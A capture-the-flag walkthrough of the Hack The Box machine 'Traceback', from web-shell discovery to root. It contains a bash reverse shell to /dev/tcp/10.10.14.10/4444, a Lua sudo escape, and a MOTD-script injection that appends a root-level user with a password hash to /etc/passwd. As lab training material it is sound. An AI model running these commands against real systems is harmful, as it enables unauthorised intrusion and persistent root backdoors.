Enumeration

As usual, we start off with an nmap script to get a listing of open ports and running services on the target:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see a fairly typical Linux web server set up with port 22 for remote SSH administration and port 80 for hosting the actual web server.

Going to the site in the browser, we see a page that appears to have been hacked. The site title mentions a back door has been left for the whole internet. We kick of some directory busting:

feroxbuster -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

However, this won’t find anything. The key is in a comment in the source code of the index.html:

<body>
	<center>
		<h1>This site has been owned</h1>
		<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
		<h3> - Xh4H - </h3>
		<!--Some of the best web shells that you might need ;)-->
	</center>
</body>

We can do a Google search for web shells, and interestingly, there is a GitHub page containing this exact string. https://github.com/TheBinitGhimire/Web-Shells?tab=readme-ov-file

We can convert this into a list we can use for directory busting and use this in feroxbuster:

shell.php
shell.asp
shell.jsp
alfav3-encoded.php
alfav4.1-decoded.php
alfav4.1-encoded.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
TwemlowsWebShell.php
wso2.8.5.php

feroxbuster -u http://$target/ -w ./shell_names.lst

This will successfully return a result for the smevk.php shell. We can browse to it at http://$target/smevk.php where we are presented with a login page to the shell.

Hackers are typically lazy and don’t change passwords of these things. Trying admin:admin will work. I guessed this but it’s in the source code of the web shell.

Getting a shell is rather simple at that point; there is an execute input, so we can just put in a typical bash TCP reverse shell (you’ll need to change to your host and port):

bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/4444 <&1'

We can catch this shell using:

rlwrap nc -lnvp 4444

Escalation to sysadmin

We arrive on the host as the webadmin user. First thing to do as usual, is gain some situational awareness, and one of the questions you should ask yourself first is, “what can this user do?”. With that in mind, we run sudo -l:

Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

Additionally, in the home directory, there is a note we can read:

webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Oddly enough, this is one of the few hosts on HTB with the .bash_history file not sym linked to /dev/null so we can read it:

ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout

We have all the information needed to privilege escalate now. We have the ability to write a lua file to our current directory (home directory) and run a tool as sysadmin that interprets lua code. We can get information from GTFOBins regarding exploiting lua, https://gtfobins.github.io/gtfobins/lua/#shell

We can produce a privesc.lua script just like the previous hacker:

os.execute("/bin/bash")

And execute it as sysadmin using sudo:

sudo -u sysadmin /home/sysadmin/luvit privesc.lua

We are successful and get a shell as sysadmin.

Escalation to root

Running ps aux as sysadmin, will, if you’re lucky, allow you to see that there is some kind of cron job interacting with the /etc/update-motd.d files:

root       8804  0.0  0.0  58792  3212 ?        S    03:25   0:00 /usr/sbin/CRON -f
root       8806  0.0  0.0   4628   804 ?        Ss   03:25   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
root       8809  0.0  0.0   7468   824 ?        S    03:25   0:00 sleep 30

If you don’t see this immediately, it would be better to run pspy on the target to watch for process changes. I was lucky.

Doing an ls -la on the directory reveals:

total 32
drwxr-xr-x  2 root sysadmin 4096 Apr 22  2021 .
drwxr-xr-x 80 root root     4096 Apr 22  2021 ..
-rwxrwxr-x  1 root sysadmin  981 Sep  3 03:27 00-header
-rwxrwxr-x  1 root sysadmin  982 Sep  3 03:27 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Sep  3 03:27 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Sep  3 03:27 80-esm
-rwxrwxr-x  1 root sysadmin  299 Sep  3 03:27 91-release-upgrade

The sysadmin user has write access to the files here because of their group permissions. cat the header reveals:

#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <[email protected]>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"

This is what the hacker has done to modify the message of the day that pops up when you ssh to the host. These files are executed upon ssh login. If we edit this with an exploit, log out and log in via ssh, the exploit will be triggered.

To enable our ssh login, we can run ssh-keygen, point the output files to /dev/shm, and then cat /dev/shm/id_rsa.pub >> ~/.ssh/authorized_keys. We can exfiltrate the id_rsa and use it to log in using ssh -i id_rsa sysadmin@$target.

To set up the exploit to be triggered on log in, we can add echo 'pentester:$1$3/vMHtaa$SK5QeFSNPR40GFN6YEbJ1.:0:0:root:/root:/bin/bash' >> /etc/passwd to the end of /etc/update-motd.d/00-header.

Log out and log back in via ssh as the sysadmin user then run su pentester using Pentester123! as the password and gain a shell as the pentester user with root effective permissions.

$ su pentester
Password:
root@traceback:/home/sysadmin# whoami
root
root@traceback:/home/sysadmin#